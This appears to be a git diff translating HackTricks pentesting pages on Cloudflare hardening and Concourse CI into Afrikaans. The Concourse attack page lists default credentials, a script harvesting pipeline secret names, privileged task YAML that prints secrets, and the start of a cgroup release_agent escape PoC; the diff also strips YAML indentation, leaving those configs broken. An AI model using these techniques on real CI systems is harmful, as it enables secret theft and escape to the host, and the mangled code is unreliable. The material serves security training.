+- Jy kan ook **witlys** IP adresse, IP reekse, lande of ASN's van die **Gereedskap** in WAF.
+- Kyk of **Geverifieerde reëls** ook kan help om kwesbaarheidsontploffings te voorkom.
+- In die **Gereedskap** afdeling kan jy **blokkeer of 'n uitdaging gee aan spesifieke IPs** en **gebruikersagente.**
+- In DDoS kan jy **sekere reëls oorskry om hulle meer beperkend te maak**.
+- **Instellings**: Stel **Veiligheidsvlak** op **Hoog** en op **Onder Aanval** as jy Onder Aanval is en dat die **Bladsy Integriteit Kontrole geaktiveer** is.
+- In Cloudflare Domeine -> Analise -> Veiligheid -> Kyk of **tarief beperking** geaktiveer is
+- In Cloudflare Domeine -> Veiligheid -> Gebeure -> Kyk vir **gedetekteerde kwaadwillige Gebeure**
 
-### Access
+### Toegang
 
 {{#ref}}
 cloudflare-zero-trust-network.md
 {{#endref}}
 
-### Speed
+### Spoed
 
-_I couldn't find any option related to security_
+_Ek kon nie enige opsie rakende veiligheid vind nie_
 
 ### Caching
 
-- [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool**
+- [ ] In die **`Konfigurasie`** afdeling oorweeg om die **CSAM Skandeer Gereedskap** te aktiveer
 
 ### **Workers Routes**
 
-_You should have already checked_ [_cloudflare workers_](./#workers)
+_Jy moet reeds_ [_cloudflare workers_](./#workers) _gekyk het_
 
-### Rules
+### Reëls
 
 TODO
 
-### Network
+### Netwerk
 
-- [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled**
-- [ ] **`HTTP/3 (with QUIC)`** should be **enabled**
-- [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled**
+- [ ] As **`HTTP/2`** **geaktiveer** is, moet **`HTTP/2 na Oorsprong`** **geaktiveer** wees
+- [ ] **`HTTP/3 (met QUIC)`** moet **geaktiveer** wees
+- [ ] As die **privaatheid** van jou **gebruikers** belangrik is, maak seker **`Onion Routing`** is **geaktiveer**
 
-### **Traffic**
+### **Verkeer**
 
 TODO
 
-### Custom Pages
+### Aangepaste Bladsye
 
-- [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode)
+- [ ] Dit is opsioneel om aangepaste bladsye te konfigureer wanneer 'n fout rakende veiligheid geaktiveer word (soos 'n blok, tarief beperking of ek is onder aanval modus)
 
 ### Apps
 
@@ -119,8 +119,8 @@ TODO
 
 ### Scrape Shield
 
-- [ ] Check **Email Address Obfuscation** is **enabled**
-- [ ] Check **Server-side Excludes** is **enabled**
+- [ ] Kyk of **E-pos Adres Obfuskering** **geaktiveer** is
+- [ ] Kyk of **Bediener-kant Uitsluitings** **geaktiveer** is
 
 ### **Zaraz**
 
@@ -131,7 +131,3 @@ TODO
 TODO
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
index 491ae7bc1..48d438b91 100644
--- a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
+++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
@@ -2,43 +2,43 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
+In 'n **Cloudflare Zero Trust Network** rekening is daar 'n paar **instellings en dienste** wat gekonfigureer kan word. Op hierdie bladsy gaan ons die **veiligheidsverwante instellings van elke afdeling analiseer:**
 
 <figure><img src="../../images/image (206).png" alt=""><figcaption></figcaption></figure>
 
 ### Analytics
 
-- [ ] Useful to **get to know the environment**
+- [ ] Nuttig om **die omgewing te leer ken**
 
 ### **Gateway**
 
-- [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications.
-  - If used, **policies** could be created to **restrict** the access to malicious sites.
-  - This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies.
+- [ ] In **`Policies`** is dit moontlik om beleide te genereer om te **beperk** deur **DNS**, **netwerk** of **HTTP** versoek wie toegang tot toepassings kan hê.
+- As gebruik, kan **beleide** geskep word om die toegang tot kwaadwillige webwerwe te **beperk**.
+- Dit is **slegs relevant as 'n gateway gebruik word**, indien nie, is daar geen rede om defensiewe beleide te skep nie.
 
 ### Access
 
 #### Applications
 
-On each application:
+Op elke toepassing:
 
-- [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access.
-  - To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also)
-- [ ] Check the **available identity providers** and make sure they **aren't too open**
+- [ ] Kontroleer **wie** toegang tot die toepassing kan hê in die **Policies** en maak seker dat **slegs** die **gebruikers** wat **toegang nodig het** tot die toepassing toegang kan hê.
+- Om toegang toe te laat, gaan **`Access Groups`** gebruik word (en **addisionele reëls** kan ook gestel word)
+- [ ] Kontroleer die **beskikbare identiteitsverskaffers** en maak seker hulle **is nie te oop nie**
 - [ ] In **`Settings`**:
-  - [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything)
-  - [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP.
-  - [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.**
+- [ ] Kontroleer dat **CORS nie geaktiveer is nie** (as dit geaktiveer is, kontroleer dat dit **veilig** is en nie alles toelaat nie)
+- [ ] Koekies moet die **Streng Same-Site** attribuut hê, **HTTP Only** en **binding cookie** moet **geaktiveer** wees as die toepassing HTTP is.
+- [ ] Oorweeg om ook **Bladsy-rendering** te aktiveer vir beter **beskerming. Meer inligting oor** [**afgeleë blaaier-isolasie hier**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.**
 
 #### **Access Groups**
 
-- [ ] Check that the access groups generated are **correctly restricted** to the users they should allow.
-- [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**.
-  - Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary.
+- [ ] Kontroleer dat die toegangsgroepe wat gegenereer is **korrek beperk** is tot die gebruikers wat hulle moet toelaat.
+- [ ] Dit is veral belangrik om te kontroleer dat die **standaard toegangsgroep nie te oop is nie** (dit **laat nie te veel mense toe nie**) aangesien **standaard** enige iemand in daardie **groep** toegang tot **toepassings** gaan hê.
+- Let daarop dat dit moontlik is om **toegang** aan **ELKEEN** te gee en ander **baie oop beleide** wat nie aanbeveel word nie, tensy 100% noodsaaklik.
 
 #### Service Auth
 
-- [ ] Check that all service tokens **expires in 1 year or less**
+- [ ] Kontroleer dat alle diens tokens **verval in 1 jaar of minder**
 
 #### Tunnels
 
@@ -50,16 +50,12 @@ TODO
 
 ### Logs
 
-- [ ] You could search for **unexpected actions** from users
+- [ ] Jy kan soek na **onverwagte aksies** van gebruikers
 
 ### Settings
 
-- [ ] Check the **plan type**
-- [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address**
-- [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service
+- [ ] Kontroleer die **plan tipe**
+- [ ] Dit is moontlik om die **kredietkaart eienaar se naam**, **laaste 4 syfers**, **verval** datum en **adres** te sien
+- [ ] Dit word aanbeveel om 'n **User Seat Expiration** toe te voeg om gebruikers te verwyder wat hierdie diens nie regtig gebruik nie
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/concourse-security/README.md b/src/pentesting-ci-cd/concourse-security/README.md
index bcf20facf..7f4875137 100644
--- a/src/pentesting-ci-cd/concourse-security/README.md
+++ b/src/pentesting-ci-cd/concourse-security/README.md
@@ -2,36 +2,32 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Basiese Inligting
 
-Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...)
+Concourse laat jou toe om **pype** te bou om outomaties toetse, aksies en beelde te loop wanneer jy dit nodig het (tydgebaseerd, wanneer iets gebeur...)
 
-## Concourse Architecture
+## Concourse Argitektuur
 
-Learn how the concourse environment is structured in:
+Leer hoe die concourse omgewing gestruktureer is in:
 
 {{#ref}}
 concourse-architecture.md
 {{#endref}}
 
-## Concourse Lab
+## Concourse Laboratorium
 
-Learn how you can run a concourse environment locally to do your own tests in:
+Leer hoe jy 'n concourse omgewing plaaslik kan loop om jou eie toetse te doen in:
 
 {{#ref}}
 concourse-lab-creation.md
 {{#endref}}
 
-## Enumerate & Attack Concourse
+## Tel & Aanval Concourse
 
-Learn how you can enumerate the concourse environment and abuse it in:
+Leer hoe jy die concourse omgewing kan tel en misbruik in:
 
 {{#ref}}
 concourse-enumeration-and-attacks.md
 {{#endref}}
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md
index d70167906..7c9647434 100644
--- a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md
+++ b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md
@@ -1,42 +1,38 @@
-# Concourse Architecture
+# Concourse-argitektuur
 
-## Concourse Architecture
+## Concourse-argitektuur
 
 {{#include ../../banners/hacktricks-training.md}}
 
-[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html)
+[**Relevante data uit Concourse-dokumentasie:**](https://concourse-ci.org/internals.html)
 
-### Architecture
+### Argitektuur
 
 ![](<../../images/image (187).png>)
 
-#### ATC: web UI & build scheduler
+#### ATC: web UI & bou skeduler
 
-The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).
+Die ATC is die hart van Concourse. Dit bestuur die **web UI en API** en is verantwoordelik vir alle pyplyn **skedulering**. Dit **verbind met PostgreSQL**, wat dit gebruik om pyplyn data (insluitend bou logs) te stoor.
 
-The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.
+Die [checker](https://concourse-ci.org/checker.html)'s verantwoordelikheid is om voortdurend na nuwe weergawes van hulpbronne te kyk. Die [scheduler](https://concourse-ci.org/scheduler.html) is verantwoordelik vir die skedulering van boue vir 'n werk en die [build tracker](https://concourse-ci.org/build-tracker.html) is verantwoordelik vir die uitvoering van enige geskeduleerde boue. Die [garbage collector](https://concourse-ci.org/garbage-collector.html) is die opruimingsmeganisme vir die verwydering van enige onbenutte of verouderde voorwerpe, soos houers en volumes.
 
-#### TSA: worker registration & forwarding
+#### TSA: werker registrasie & forwarding
 
-The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc).
+Die TSA is 'n **aangepaste SSH-bediener** wat slegs gebruik word vir die veilige **registrasie** van [**werkers**](https://concourse-ci.org/internals.html#architecture-worker) met die [ATC](https://concourse-ci.org/internals.html#component-atc).
 
-The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer.
+Die TSA luister **standaard op poort `2222`**, en is gewoonlik saam met die [ATC](https://concourse-ci.org/internals.html#component-atc) en sit agter 'n laaibalans.
 
-The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa).
+Die **TSA implementeer CLI oor die SSH-verbinding,** wat [**hierdie opdragte**](https://concourse-ci.org/internals.html#component-tsa) ondersteun.
 
-#### Workers
+#### Werkers
 
-In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim).
+Om take uit te voer, moet Concourse 'n paar werkers hê. Hierdie werkers **registreer hulleself** via die [TSA](https://concourse-ci.org/internals.html#component-tsa) en bestuur die dienste [**Garden**](https://github.com/cloudfoundry-incubator/garden) en [**Baggageclaim**](https://github.com/concourse/baggageclaim).
 
-- **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**.
-- **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**.
+- **Garden**: Dit is die **Container Manage API**, gewoonlik bedryf in **poort 7777** via **HTTP**.
+- **Baggageclaim**: Dit is die **Volume Management API**, gewoonlik bedryf in **poort 7788** via **HTTP**.
 
-## References
+## Verwysings
 
 - [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
index 4b778a804..38125201d 100644
--- a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
+++ b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
@@ -6,213 +6,202 @@
 
 ### User Roles & Permissions
 
-Concourse comes with five roles:
+Concourse kom met vyf rolle:
 
-- _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC.
-- **owner**: Team owners can **modify everything within the team**.
-- **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings.
-- **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations.
-- **viewer**: Team viewers have **"read-only" access to a team** and its pipelines.
+- _Concourse_ **Admin**: Hierdie rol word slegs aan eienaars van die **hoofspan** (standaard aanvanklike concourse-span) gegee. Admins kan **ander spanne konfigureer** (bv.: `fly set-team`, `fly destroy-team`...). Die toestemmings van hierdie rol kan nie deur RBAC beïnvloed word nie.
+- **eienaar**: Span eienaars kan **alles binne die span wysig**.
+- **lid**: Span lede kan **lees en skryf** binne die **span se bates** maar kan nie die spaninstellings wysig nie.
+- **pipeline-operator**: Pipeline operators kan **pipeline operasies** uitvoer soos om boue te aktiveer en hulpbronne vas te pen, maar hulle kan nie pipeline konfigurasies opdateer nie.
+- **kyker**: Span kykers het **"lees-slegs" toegang tot 'n span** en sy pipelines.
 
 > [!NOTE]
-> Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
+> Boonop kan die **toestemmings van die rolle eienaar, lid, pipeline-operator en kyker gewysig word** deur RBAC te konfigureer (meer spesifiek, sy aksies). Lees meer daaroor in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
 
-Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them.
+Let daarop dat Concourse **pipeliner binne Spanne groepeer**. Daarom sal gebruikers wat aan 'n Span behoort, in staat wees om daardie pipelines te bestuur en **verskeie Spanne** mag bestaan. 'n Gebruiker kan aan verskeie Spanne behoort en verskillende toestemmings binne elkeen hê.
 
 ### Vars & Credential Manager
 
-In the YAML configs you can configure values using the syntax `((_source-name_:_secret-path_._secret-field_))`.\
-[From the docs:](https://concourse-ci.org/vars.html#var-syntax) The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\
-The **optional \_secret-field**\_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\
-Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`.
+In die YAML konfigurasies kan jy waardes konfigureer met die sintaksis `((_source-name_:_secret-path_._secret-field_))`.\
+[Van die dokumentasie:](https://concourse-ci.org/vars.html#var-syntax) Die **source-name is opsioneel**, en as dit weggelaat word, sal die [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) gebruik word, of die waarde kan [staties](https://concourse-ci.org/vars.html#static-vars) verskaf word.\
+Die **opsionele \_secret-field**\_ spesifiseer 'n veld op die verkregen geheim om te lees. As dit weggelaat word, kan die credential manager kies om 'n 'standaard veld' van die verkregen credential te lees as die veld bestaan.\
+Boonop kan die _**secret-path**_ en _**secret-field**_ omring word deur dubbele aanhalings `"..."` as hulle **spesiale karakters** soos `.` en `:` bevat. Byvoorbeeld, `((source:"my.secret"."field:1"))` sal die _secret-path_ op `my.secret` stel en die _secret-field_ op `field:1`.
 
 #### Static Vars
 
-Static vars can be specified in **tasks steps**:
-
+Statische vars kan in **take stappe** gespesifiseer word:
 ```yaml
 - task: unit-1.13
-  file: booklit/ci/unit.yml
-  vars: { tag: 1.13 }
+file: booklit/ci/unit.yml
+vars: { tag: 1.13 }
 ```
+Or gebruik die volgende `fly` **argumente**:
 
-Or using the following `fly` **arguments**:
+- `-v` of `--var` `NAME=VALUE` stel die string `VALUE` as die waarde vir die var `NAME` in.
+- `-y` of `--yaml-var` `NAME=VALUE` ontleed `VALUE` as YAML en stel dit as die waarde vir die var `NAME` in.
+- `-i` of `--instance-var` `NAME=VALUE` ontleed `VALUE` as YAML en stel dit as die waarde vir die instance var `NAME` in. Sien [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) om meer te leer oor instance vars.
+- `-l` of `--load-vars-from` `FILE` laai `FILE`, 'n YAML-dokument wat var name aan waardes koppel, en stel dit alles in.
 
-- `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`.
-- `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`.
-- `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars.
-- `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all.
+#### Kredensiaalbestuur
 
-#### Credential Management
+Daar is verskillende maniere waarop 'n **Kredensiaalbestuurder gespesifiseer kan word** in 'n pyplyn, lees hoe in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
+Boonop ondersteun Concourse verskillende kredensiaalbestuurders:
 
-There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
-Moreover, Concourse supports different credential managers:
-
-- [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html)
-- [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html)
-- [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html)
-- [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html)
-- [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html)
-- [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html)
-- [Caching credentials](https://concourse-ci.org/creds-caching.html)
-- [Redacting credentials](https://concourse-ci.org/creds-redacting.html)
-- [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html)
+- [Die Vault kredensiaalbestuurder](https://concourse-ci.org/vault-credential-manager.html)
+- [Die CredHub kredensiaalbestuurder](https://concourse-ci.org/credhub-credential-manager.html)
+- [Die AWS SSM kredensiaalbestuurder](https://concourse-ci.org/aws-ssm-credential-manager.html)
+- [Die AWS Secrets Manager kredensiaalbestuurder](https://concourse-ci.org/aws-asm-credential-manager.html)
+- [Kubernetes Kredensiaalbestuurder](https://concourse-ci.org/kubernetes-credential-manager.html)
+- [Die Conjur kredensiaalbestuurder](https://concourse-ci.org/conjur-credential-manager.html)
+- [Kredensiale kas](https://concourse-ci.org/creds-caching.html)
+- [Kredensiale redigering](https://concourse-ci.org/creds-redacting.html)
+- [Herhaal mislukte verkrygings](https://concourse-ci.org/creds-retry-logic.html)
 
 > [!CAUTION]
-> Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them.
+> Let daarop dat as jy 'n soort **skrywe toegang tot Concourse** het, jy werksgeleenthede kan skep om **daardie geheime te onttrek** aangesien Concourse toegang tot hulle moet hê.
 
-### Concourse Enumeration
+### Concourse Enumerasie
 
-In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file.
+Om 'n concourse omgewing te enumerateer, moet jy eers **geldige kredensiale versamel** of 'n **geverifieerde token** vind waarskynlik in 'n `.flyrc` konfigurasie lêer.
 
-#### Login and Current User enum
+#### Teken in en Huidige Gebruiker enum
 
-- To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**:
-  - `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
-- Get configured **targets**:
-  - `fly targets`
-- Get if the configured **target connection** is still **valid**:
-  - `fly -t <target> status`
-- Get **role** of the user against the indicated target:
-  - `fly -t <target> userinfo`
+- Om in te teken, moet jy die **eindpunt**, die **spannaam** (standaard is `main`) en 'n **span waartoe die gebruiker behoort** weet:
+- `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
+- Kry geconfigureerde **teikens**:
+- `fly targets`
+- Kry of die geconfigureerde **teikenverbinding** steeds **geldig** is:
+- `fly -t <target> status`
+- Kry die **rol** van die gebruiker teen die aangeduide teiken:
+- `fly -t <target> userinfo`
 
 > [!NOTE]
-> Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials.
+> Let daarop dat die **API token** **gestoor** word in `$HOME/.flyrc` per standaard, jy wat 'n masjien plunder, kan daar die kredensiale vind.
 
-#### Teams & Users
+#### Spanne & Gebruikers
 
-- Get a list of the Teams
-  - `fly -t <target> teams`
-- Get roles inside team
-  - `fly -t <target> get-team -n <team-name>`
-- Get a list of users
-  - `fly -t <target> active-users`
+- Kry 'n lys van die Spanne
+- `fly -t <target> teams`
+- Kry rolle binne die span
+- `fly -t <target> get-team -n <team-name>`
+- Kry 'n lys van gebruikers
+- `fly -t <target> active-users`
 
-#### Pipelines
-
-- **List** pipelines:
-  - `fly -t <target> pipelines -a`
-- **Get** pipeline yaml (**sensitive information** might be found in the definition):
-  - `fly -t <target> get-pipeline -p <pipeline-name>`
-- Get all pipeline **config declared vars**
-  - `for pipename in $(fly -t <target> pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t <target> get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
-- Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them):
+#### Pyplyne
 
+- **Lys** pyplyne:
+- `fly -t <target> pipelines -a`
+- **Kry** pyplyn yaml (**sensitiewe inligting** mag in die definisie gevind word):
+- `fly -t <target> get-pipeline -p <pipeline-name>`
+- Kry al die pyplyn **konfigurasie verklaarde vars**
+- `for pipename in $(fly -t <target> pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t <target> get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
+- Kry al die **pyplyne geheime name wat gebruik word** (as jy 'n werk kan skep/wysig of 'n houer kan oorneem, kan jy hulle onttrek):
 ```bash
 rm /tmp/secrets.txt;
 for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do
-    echo $pipename;
-    fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
-    echo "";
+echo $pipename;
+fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
+echo "";
 done
 echo ""
 echo "ALL SECRETS"
 cat /tmp/secrets.txt | sort | uniq
 rm /tmp/secrets.txt
 ```
+#### Houers & Werkers
 
-#### Containers & Workers
+- Lys **werkers**:
+- `fly -t <target> workers`
+- Lys **houers**:
+- `fly -t <target> containers`
+- Lys **boude** (om te sien wat aan die gang is):
+- `fly -t <target> builds`
 
-- List **workers**:
-  - `fly -t <target> workers`
-- List **containers**:
-  - `fly -t <target> containers`
-- List **builds** (to see what is running):
-  - `fly -t <target> builds`
+### Concourse Aanvalle
 
-### Concourse Attacks
-
-#### Credentials Brute-Force
+#### Kredensiaal Brute-Force
 
 - admin:admin
 - test:test
 
-#### Secrets and params enumeration
+#### Geheimenisse en params enumerasie
 
-In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them.
+In die vorige afdeling het ons gesien hoe jy **alle geheime name en vars** wat deur die pyplyn gebruik word, kan **kry**. Die **vars kan sensitiewe inligting bevat** en die naam van die **geheimenisse sal nuttig wees later om te probeer om** hulle te steel.
 
-#### Session inside running or recently run container
-
-If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `<pipeline>/<job>` **container** using:
+#### Sessie binne lopende of onlangs lopende houer
 
+As jy genoeg voorregte het (**lid rol of meer**) sal jy in staat wees om **pyplyne en rolle te lys** en net 'n **sessie binne** die `<pipeline>/<job>` **houer** te kry met:
 ```bash
 fly -t tutorial intercept --job pipeline-name/job-name
 fly -t tutorial intercept # To be presented a prompt with all the options
 ```
+Met hierdie toestemmings mag jy in staat wees om:
 
-With these permissions you might be able to:
+- **Die geheime** binne die **houer** te **steel**
+- Probeer om te **ontsnap** na die node
+- **Cloud metadata** eindpunt te **enumerate/benut** (van die pod en van die node, indien moontlik)
 
-- **Steal the secrets** inside the **container**
-- Try to **escape** to the node
-- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible)
-
-#### Pipeline Creation/Modification
-
-If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example:
+#### Pyplyn Skepping/Wysiging
 
+As jy genoeg voorregte (**lid rol of meer**) het, sal jy in staat wees om **nuwe pyplyne te skep/wysig.** Kyk na hierdie voorbeeld:
 ```yaml
 jobs:
-  - name: simple
-    plan:
-      - task: simple-task
-        privileged: true
-        config:
-          # Tells Concourse which type of worker this task should run on
-          platform: linux
-          image_resource:
-            type: registry-image
-            source:
-              repository: busybox # images are pulled from docker hub by default
-          run:
-            path: sh
-            args:
-              - -cx
-              - |
-                echo "$SUPER_SECRET"
-                sleep 1000
-          params:
-            SUPER_SECRET: ((super.secret))
+- name: simple
+plan:
+- task: simple-task
+privileged: true
+config:
+# Tells Concourse which type of worker this task should run on
+platform: linux
+image_resource:
+type: registry-image
+source:
+repository: busybox # images are pulled from docker hub by default
+run:
+path: sh
+args:
+- -cx
+- |
+echo "$SUPER_SECRET"
+sleep 1000
+params:
+SUPER_SECRET: ((super.secret))
 ```
+Met die **wysiging/creatie** van 'n nuwe pyplyn sal jy in staat wees om:
 
-With the **modification/creation** of a new pipeline you will be able to:
+- **Steal** die **secrets** (deur dit uit te echo of binne die houer in te gaan en `env` te loop)
+- **Escape** na die **node** (deur jou genoeg regte te gee - `privileged: true`)
+- Enumereer/benut **cloud metadata** eindpunt (van die pod en van die node)
+- **Delete** geskepte pyplyn
 
-- **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`)
-- **Escape** to the **node** (by giving you enough privileges - `privileged: true`)
-- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node)
-- **Delete** created pipeline
-
-#### Execute Custom Task
-
-This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**):
+#### Voer Aangepaste Taak Uit
 
+Dit is soortgelyk aan die vorige metode, maar in plaas daarvan om 'n hele nuwe pyplyn te wysig/te skep, kan jy **net 'n aangepaste taak uitvoer** (wat waarskynlik baie meer **stealthier** sal wees):
 ```yaml
 # For more task_config options check https://concourse-ci.org/tasks.html
 platform: linux
 image_resource:
-  type: registry-image
-  source:
-    repository: ubuntu
+type: registry-image
+source:
+repository: ubuntu
 run:
-  path: sh
-  args:
-    - -cx
-    - |
-      env
-      sleep 1000
+path: sh
+args:
+- -cx
+- |
+env
+sleep 1000
 params:
-  SUPER_SECRET: ((super.secret))
+SUPER_SECRET: ((super.secret))
 ```
 
 ```bash
 fly -t tutorial execute --privileged --config task_config.yml
 ```
+#### Ontsnapping na die node vanaf 'n bevoorregte taak
 
-#### Escaping to the node from privileged task
-
-In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex".
-
-In the following PoC we are going to use the release_agent to escape with some small modifications:
+In die vorige afdelings het ons gesien hoe om **'n bevoorregte taak met concourse uit te voer**. Dit sal nie die houer presies dieselfde toegang gee as die bevoorregte vlag in 'n docker-houer nie. Byvoorbeeld, jy sal nie die node lêerstelsel toestel in /dev sien nie, so die ontsnapping kan meer "kompleks" wees.
 
+In die volgende PoC gaan ons die release_agent gebruik om te ontsnap met 'n paar klein wysigings:
 ```bash
 # Mounts the RDMA cgroup controller and create a child cgroup
 # If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
